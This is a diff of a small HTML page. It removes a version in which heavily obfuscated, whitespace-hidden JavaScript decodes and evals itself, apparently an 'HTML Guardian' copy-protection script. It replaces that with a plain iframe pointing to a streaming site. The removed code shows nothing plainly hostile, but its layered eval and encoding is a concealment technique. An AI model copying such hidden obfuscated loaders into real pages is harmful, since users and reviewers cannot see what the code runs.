--- a/max/supervariety4.html
+++ b/max/supervariety4.html
@@ -1,128 +1,16 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-																																							<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var c6ca8b5=true;ll1=document.layers;lll=window.sidebar;c6ca8b5=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6ca8b5|=lII;zLP=location.protocol+'0FD';x01vU4n62C=new Array();bON27W5e63=new Array();bON27W5e63[0]='\152%36\130\117%73%37%36%4C%57X%72%39%35';x01vU4n62C[0]='<!doctype html><~\n~~head~script>eval(une~a~(\'~ %72%20qy%37~5D~0~72~73B~3~58~8St~-2ing~0Efr\\15~76DCharCo%64~[5~0~B31~53~0C~5~c30~09~5B~O46or~`i~8~5~k~>~[~m3~g3~/~b~5}za6~n~{~0B}~l~-~?~O7~i~;}3D~@3~B7~9~>fu~[E~[3ti~O~Q}"}~1~-~c7~|}%~B2~m7}6~m6}+~0~c~\\}"7~p3~O65m~p~_6E~E2}}7~P}914};1}=}?}J5ntM~Z~\\e~0}%}%1~}u}"}A}Q}D}F1ll}\n}/d}8}]~[De}R~K}<7~N~P1~E}=~`}<1~4~6}g~9}~n}y}{}4}-|za}J6}^~P}6~e7~]}1}8n~00|~5~m2},}.~o1~.}"~i~|~92}za~g7~e|!}	|!p~p}6}~1s~E})}"|~_}~:~p4|sp}f61}\r~iA}}UE}W~<~5}~}}<0}s4|3|,~/2~?}{}~0|"~0Fp~t}w3|G~g2F}<|%|O}|&7|}J|=|	|F|T~nz~v~~w}B~^~-~;0A~t~.~[|h}~`~:|yf}<4e}<~/42}@~[}I5|h5}%~;|]~R2{|}j|}P~O05}$d|}2{a|}M{~F{}AE{|E{~:b~^f~s{0{}P{}!|i{(~|}7A|~d~8~%}q||v{|*~-|},~R8}vD|1{{h~^{C~\\{L|}6{1}#}J4~4{6}}3~[|_}M|O8k~w~j~n{b~}~8|m{<}E~[C}@~It{N~>{b|P|\'|z}3~]}{6F}~-}A}m}o{k6~R{{!%|L|;z5z|L}$|/~e{y~O2||h47N|*m|D}|@}1{<5B{b5| {7~[~r~F||6|@|4{d~>}"|U|4{9|n~]}E|1{n{~-|7~P~yBj|\'|c|f{]z+||n}z?{x~~}~e~zz!{tzR||~p}+{wz!{y%z#~[|@z&}g|{{\n~5~]z\\z-z[| }F9||$~^}s{Q4}[ja{}=}${zaHz[z=~P~O}J}x|~G}z[B~vz_{zX~||}.}~y~-y\r~>\'))</~~~~~~~~cuz}R.w~te("<tabl~wid{p=\'10~k\' b~sdery30\'~tryBdy9gcol~sy3#y6}3y6y8~!ign = \'c}ny%ryA<{-}R |.yy-yW\'yat-family: Vy=dana, |vi~!yzHelve} cyyycyws-sy=if; yixizeyr12pxxyIyKryr#Fx"x#xbackgro~$d-x~sx yO6yQ>T~ycx,ry[ yIy< of {pis pag~xExGx+y%~eyFby <b~yiyc~yfy3x0x x!FCCx5HTML Gu~Wdy}nyyi~/xWxUbyDx7~ul} may%xCoyJwxMoxOt yx: xfxhx=oy<yzix~xJsyzJa~  ~(|:xw w~ yywl~Hkwkeep webw}Ry\\xyoy]xFawaxTywyFmuch m{..wFxU/xrxVyD<axZye~y3y%xyjy<yIrxionyrnw[exyJx1x`x"xcyQ~	refy3~\ntp://wws.|Xww:wi.yImy8y*rxJty3_y,ywkyAxvxXw[wydx\\yhv\nykymyoyqysyuywxy|y~wxxxxsx	xx\rxxvsxx xxwaxx wexd0x%x\'x)x+x-x/wbx_yN0yPy@>wsw.PxNW~Wewzomxqv\nxsxWyaxst~yyCvPy+y->");dl=yyy\\.lw;y=s;oe=y/n~v@o~wX?1:v1yv=(v_y t.vyy\\}Ty<||v}y!~!l)&&!vh;xJv^~v`y!vzaEy-vzById;wsvj~Hvm.v&y<x&r?yCuxyllx;tN=yxvyTx~s.uxrAxJy!toLow/~Xax(vZxu.u-.uexOf~*~%t~\'~y';rQsxI56wNI5Fq1='fu';rpyn3YvP396='SgDjovMeHGtVkEeOgaeUmZbygOYdfWbC';rQsxI56wNI5Fq1+=    'nction soVfbS'+'x4mYKJBJD(y135xzN'+'me38EMT){';gNv8v4s4NV='r8Q66M1KySg3H4';hV7Lt6zQ8='%69%66%28%7AL\120%2E%69\156de\170\117%66%28%27%5C%35%35%27%29%3E%30%29%7B%78%30%31\166U%34%6E%36%32%43%5B%30%5D%3D%27\170%27%7D%3Bva%72%20l%32%3Dw\151n\144o\167%2Eo\160\145r%61%3F%31%3A%30%3Bf\165%6Ec%74io%6E%20%6C%35%62%38%61\143%36%63%28%29%7B%69f%28%63%36ca%38b%35%29%7Bd\157%63ume\156%74%2E%77%72it\145%28%6C\117%29%7D%7D%3Bf\165%6E%63ti%6Fn%20\154%33%28\154%34%29%7B\154%35%3D%2F%7A\141%2F\147%3Bl%36%3DSt%72i%6E%67%2Efrom\103h\141%72Co\144\145%28%30%29%3B%6C%34%3Dl%34%2E\162e\160la%63e%28\154%35%2C\154%36%29%3B\166a%72%20\154%37%3D\156%65%77%20A%72\162a\171%28%29%2C%6C%38%3D%5F%31%3Dl%34%2El\145\156g%74\150%2C%6C%39%2ClI%2C\151\154%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C%6Ci%3D%27%27%3Bdo%7Bl%39%3D\154%34%2Ech%61%72\103%6F\144e%41t%28%5F%31%29%3B\154I%3D%6C';function x4mYKJBJDsoVfbS(n62D3SRjX4p1H8){rpyn3YvP396+=n62D3SRjX4p1H8};eval(unescape('%66u\156\143t%69\157\156%20%76%38\154%4A\107%20%20%20%20%28k\103%34\170%30%38%37\142%30l%6B\161\105%29%7Bbs%32QU%37%33h%48\115%31\145%70%71%3D\153C%34%78%30%38%37%62%30\154\153\161%45%7D%3B'));bON27W5e63[0]+=    '\154%39arC%35%61%36%57\132%32';x01vU4n62C[0]+=    '>=0u%ru\':u)u+|muyv;u^8v^a;~ rwCsgy3\';}n~wZyV~%muD{wituryVu&e}uuu?.w_rx+uhyXutuaOFuvltyKx} w[wuxN~yJuIvluKuM~*fyoey!=-1uXuZu\\w`i7wku^u!ztt%u(~!u+xvxa){uv{w[dwXg|.~Wvuouqw[ uvuxuzyVt\'utCtyVcIEuv(mujvZtHu{xt3u~un~$tDtOcuvt:tupv\nuK~}nu=tPE;xtTwex,ty\'cta)",~10)utwuDtLt^tNx=NS(et8t5v\\uus\nuNvFwhiwA==2usss=3t8tTtV;tXtJt[}s&;sut9uvzwz~(uywiEx}Rs(s2vaMOUSEDOWNvZtcw[wDu6xQu?ntks}xxs+ys-sDx,xupsJSusCtew3wTy tj~%w Fsury\'s#tZu*evYs(uNvht8tMur x+ssss3v{butu<sIst8~!y=tuy8ys"xtI 0usgu}sYs,vasRsFvmsIx+supsns9uvvkut@uyurtnxtqzttuOruD\',y5y6tWrtYrsl(u\ns	{rrsBry!rxoxy>r7v[r:t;nsEr=szu/rrt_ u0(t7uwr/s$sirKsu1strRs0ns.w~vzar_xINymet!nx{luvFr`xrbgrdzu ~x;h~*^(INPUT|TEXTAREA|Br}TON|s<LECr~EMBs=|OBJqr~w\rL)$t t"1t~t]rsqu2rZt5sshsq${rtx~uzes7s4s6sw.s9s;qOVEvZq3vnrEsSewDx=rNs\'sptEu3q+sy"sq/=q1qE.wiy-uBq8sws5q9v{q>s<s9qBqDtqFrFqIr>virh}es\' s)t8qZq5s0q_y\\qaq<qdEUP|qbq=s:s<s>s@qhtqjqHrqL2tzaptdqksUqL3sLsiqruNxJt-yvt8sZqkprXrVsqnr]suqZvzaSxet_t8ugxCt\rup\'p)t_uDr_o~D~~IuDr2v{uJuLuN\'qw/uBdzxcuT1uv{y-{oh>4t}sOusxwyt~%rqy3.umtwYtq\\o~sr"tptrr&"p#uDtzt|t~upjvZqOusiuvsrQsZxy-~t@rtBsdtEtGrSshxutor$tsszy\'npttyt{r-s\'op:p-qlsVt\'v[msItcp^tN.hwixdov^op5u>u@Cq^p:o"oo%sub|.rvxo%p=t\'wqy+2sBo#o,u o0o2~Hg(0,o?o6p?/yvZw9qnesa|vwXy~*~~oyi.gi{po0uIor*\'v?.aymobttvr_v,\'ofwDoiy-okomobodoqohojolgaoboyosxo|o~oonzaouo\\o^bo`ob~1|!ofn\r2o[o]ho_wZowwtnzao{wzfoognoucnoooxnn~norn&ln(ohok~190nn	nnn%otv~~dx{vFy,ot?pwvGw|n#nn6n1.n\'nEv@nn7nIo}nnMnGoknIn!nRoenTvnItonopnZ1x.n>n@nBw{n,nn8wAxQn<ncyKnev{ngn5n)n7n-~15n1nd|9nfvHr{-o3muV;vIoNvb}ng{pm++suoHtp>rPw/[m])>t#t8osVu};xw~ks\'t5!mt8xDsvb~p_noo y3y+tt:vnvupvt-vht-t)fsocy3<\'+\'xnvwOy-="nAv&tN:y+syJszw`y-ft:t#y60v+u<womWy6v+y/y1h:x4v+~yT~\n:35v+z-p=:1">mA\'m@mB~HpszxC~vi"sys{w[" yxzmHxqql~ lu\'mHlw[Cw&x(tkcduDmFm}u1v&oso]yqsdy<nmrmvo8mDmsrBsPvay#o]y&fcpqpt`lt8cw&py:xmDxawzq]rl:y*pdprx=y[uvlql=skp:opgo	"twy&o\r~jt}or#lNtulPlElSmXq%yw#y<l`wy0y3lI}dyAp-ppyInwkv1oy7ul;~3ucp7oC.~MvH~U~W~Yy<(13r+oFkkpq~s(imi<z4s(mmls+=lwulna1mH<"+"!--k~37k k#kmr';rQsxI56wNI5Fq1+=    'eva';tCXV94Sv2Gfw2='OSJSXXnqgKxHkhaUZnyBsTrD';rQsxI56wNI5Fq1+=    'l(unes';l4gV6tV60US='le48BR7pC5D5L3dRS3';rQsxI56wNI5Fq1+=    'cape(y135xzNme38EMT))}';eval(rQsxI56wNI5Fq1);g57Y31qVIkgFB5T='iqqOrnBDpunOUFXOpGQZmOcOZfCYdG';rQsxI56wNI5Fq1='';hV7Lt6zQ8+=    '%34%2Ec\150a%72\103o%64e%41t%28%2B%2B%5F%31%29%3Bl%37%5B\111%2B%2B%5D%3DlI%2B%69%6C%2D%28l%39%3C%3C%37%29%7D%77h%69\154%65%28%5F%31%2B%2B%3C\154%38%29%3B%76\141\162%20l%31%3Dn%65\167%20\101%72r%61y%28%29%2Cl%30%3D\156%65w%20%41r%72ay%28%29%2C\111\154%3D%31%32%38%3Bd%6F%7B\154%30%5BIl%5D%3DS\164\162%69%6Eg%2E%66%72%6F\155C%68a\162\103%6Fd\145%28%49l%29%7Dwh\151\154e%28%2D%2D%49%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3D\154%30%5Bl%37%5B%30%5D%5D%3Bl%6C%3D%6C%37%5B%30%5D%3B%5Fl%3D%31%3B\166\141%72%20\154%5F%3D\154%37%2El%65ngth%2D%31%3B%77\150i%6Ce%28%5F%6C%3C\154%5F%29%7B\163wi%74%63%68%28%6C%37%5B%5F\154%5D%3CIl%3F%31%3A%30%29%7B\143\141\163\145%20%30%20%3Al%30%5BIl%5D%3Dl%30%5B%6Cl%5D%2BS\164r\151n%67%28%6C%30%5Bll%5D%29%2Esu%62st%72%28%30%2C%31%29%3Bl';x4mYKJBJDsoVfbS('b3N77o72DPNi10F');hI5LRVr49Jt2='l';l4gV6tV60US+=    'fgOct33704Gof';x01vU4n62C[0]+=    '";kIv]"/k**k%k"k4k k2;Ik<ky(yk*yvX+lg1Ik)kDlhkGo<k y3kkEkGsk muyyk*yk,k/nakskXywly3xn|9vcyqw^~%y_|XekCk&k ykjxsk^k xHnvXk;}dv]k[1kDk+kzkwkkk*|9ywkvk<k/kk2k jkukZ}ek>kjktka~+xEil~:ll!yApA~spDpFkjlq&rLkkFuvlgk<u/oPy{tw;~*bwj{.Beo\\nomTy=j6j8obj3mzaq8vlj:y]EjCvZj+v]s`j/oS~*~n+oo~~j?pUoobwgobmDobmzanD\'y*y,toolcjWnmytobprj+kk.rYvZsy/twA(jll4q^v):jIj-oQj0oT}),iik|$iiiii\n|$vZmak;xx 2jzjj}jLj1},zi7r+5i1i ,9i%t{2i$~Pi\rwiiijx3ij,jKoRj1oFii~Pi\'i:i&i&|!i*5i,m i/i4i2j|i4j(iiii:zqi$i=i(i@iBi.y<ylx{mUj{ii5oToFi_,i`ibiaidlUkw}di\\iJj(i#k.l,ji#kziokxiskiok<ink/kjHlhrYtcuuqyuTrcrejuix[2m[0]t{is}d[7munk\nvv1t<jImpMu,k{mj{[t]k;k.ul)uxuqIhyhrphjIh#h~aL=k[Ihm	hho3jmj<h6L;jhmza(xmxk;xht5m&Mxhwuu?(i)xy{kErYh:[jhxhlm>hj4ms&s\'lhlgp:i}jok-kFkGjH}ehwpeor&\'i}hwr*r,iflChphw{p-izj|tcwxI~&,j(v]ow\'wyoh9hyh<{pgv]gghio}ej%stks*k[grCwzi-y%h,vz~*jrizkyhy[k#yoh%m#(lllnf&o<m&ry{g&oell}nd~Uyolg1wuvE}RNwvFwi|:x\'egHlgJkiyg y}tjtr5hnusy-jug%gYh(pSg)~g+h}Rg.ktg0g =gg4-}eg7uN!g9lmw[g<q$g?gAgCwgFgVgX}egLwigNgPq[w,vcy[frygYg}eg\\g^rvg`gagkrqit~sIqoj%sCfu/ril(gil+y%f%}epurzap}f+j%p!tEk.gp-tgwXscup1C}R}RuVf3yVg f6~W f8af:c{f>hfA h`s,p,l/{yCgAm#qZu!w0~Wt8vF~Hu7tAdzsy[}Rqhk<[phl/piuwn!ghs-~gkeRywxJp4fuxgUtfwTxllFt>g-l/r2sVuVf^fy\\gOy<tfaj6jA(x;f,s	m6uNeq1f_rre{.en!el{ir|.fq%t5eo<{vFfvlfee)esse-ef\nef`ej4wie!evF~%wTSjw&~Ipng]xjtxuut8qNl1fOkK(jt8y>hV{pq[w=vHo+il@lRo[lWzp:t5hAqXt8o=ly~Il{x+ml~~XgP(eXhXfyKk\nr*25+}=g\\sM~{eietl{ewo3eyd*gkI\'umokovgdd=oeeTe5ehdddr\nodp;m|xAw.f~dqbLxEy%pXt!\'x-wj~HxQyq2d%l d(d*}ny=~*yKjSgnaI,t\'t~dzap(~~d#tcd&d7|.d9rd-d/t~%dd3dJd6swd)dMpXd;pbdTd>kFdAt[dCpt5dGtsxBqZxy*wAqbdPtdRd2qtd%s{x\'hqb~*w[d<d^j(Iq%lCjnj*k=ms_wu2u<ru5u7u9vau<o\'y=o)uCuEuNfZy0f\\rt8jlsdquovHr5cpr2qZvoy=rQc4ddJ}eujlt!=4cc1duty<m\'vyl~pHc1lhsdfikegu~#c6tp?i~y5c=c>ky5dr\\eRlh}l_yyxUlc>fj)fzah_grih+gmtuud;hpjkg e8u-fwiqJgUgclg ueIjsftc{s&cVy~lbx[~zxnamH|X~Htmry:dxTt9xEgSkfw_cUybzayBo]vWAA s9BIq TVvSbkkcYbzam{~mHwSt/csk^>y9pUh ~Wj8vt;}xwXz{xHl oCb6y:ry<xv1mJo]urmMo1mPy%tzamampy6%;mfgmhr,bQbvb$yjRvRb\ny~b9reycx;mHwmpswp/x~xn|p}tdeysUy=ugcJ~4wuhpl#/bazvLpUxsjO>';hV7Lt6zQ8+=    '%31%5B%5F%6C%5D%3D\154%30%5BI%6C%5D%3B\151\146%28%6C%32%29%7Bl\151%2B%3D%6C%30%5B\111l%5D%7D%3B\142%72\145\141k%3B%64%65%66au%6Ct%3Al%31%5B%5Fl%5D%3D%6C%30%5B%6C%37%5B%5Fl%5D%5D%3B\151%66%28l%32%29%7B\154i%2B%3D%6C%30%5Bl%37%5B%5F\154%5D%5D%7D%3B%6C%30%5B\111l%5D%3D\154%30%5Bl%6C%5D%2BStr\151n\147%28l%30%5Bl%37%5B%5Fl%5D%5D%29%2Es%75\142st%72%28%30%2C%31%29%3Bb\162e\141k%7D%3B%49l%2B%2B%3Bll%3Dl%37%5B%5F\154%5D%3B%5Fl%2B%2B%7D%3B%69f%28%21\154%32%29%7Br\145\164u\162n%28l%31%2E\152\157%69n%28%27%27%29%29%7Delse%7Bre%74ur%6E%20\154\151%7D%7D%3Bva%72%20lO%3D%27%27%3Bf\157\162%28i%69%3D%30%3Bi\151%3Cx%30%31\166%55%34\156%36%32%43%2El\145%6E\147%74\150%3Bii%2B%2B%29%7Bl\117%2B%3Dl%33%28x%30%31v\125%34%6E%36%32%43%5B\151%69%5D%29%7D%3B%6C%35b%38\141\143%36%63%28%29%3B';</script><!--gC6z48w11oSX--><script>g57Y31qVIkgFB5T      ='psxHxKLOoqpljRGSNdCJHppfKUcehgIgjUKlKHgCXO';m9IS7785oYN7='lY5b8nc93V219Kz';x4mYKJBJDsoVfbS    (tCXV94Sv2Gfw2);soVfbSx4mYKJBJD  (hV7Lt6zQ8);neW7eb7Xt7u1q24='v13QH1ttfJFRvi19LKYllLYr3L';eval(unescape('%71%79%36%28%27%39%65%62%64%63%27%29%3B'));hI5LRVr49Jt2+=    'eSQTZfIRLmrCOjuOOOgprcdvBDotgfcDyjOxLOeCTYlqOSVWvxOushrOMfZfOmDGbhXFlxOfylqTjVgCWOVHpPvtOx';</script><script>qk28efN33='ncFwbg0eL6fUzmD';</script></head><body></body></html>
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+<!doctype html>
+<html>
+
+<head>
+<title>AA MOBILE TV</title>
+<style type="text/css">
+body {margin:0;}
+iframe {padding:0;border:0;position:absolute;width:100%;height:100%;}
+</style>
+</head>
+
+<body>
+<iframe src="https://maxsport.one/supervariety4.php"></iframe>
+</body>
+
+</html>
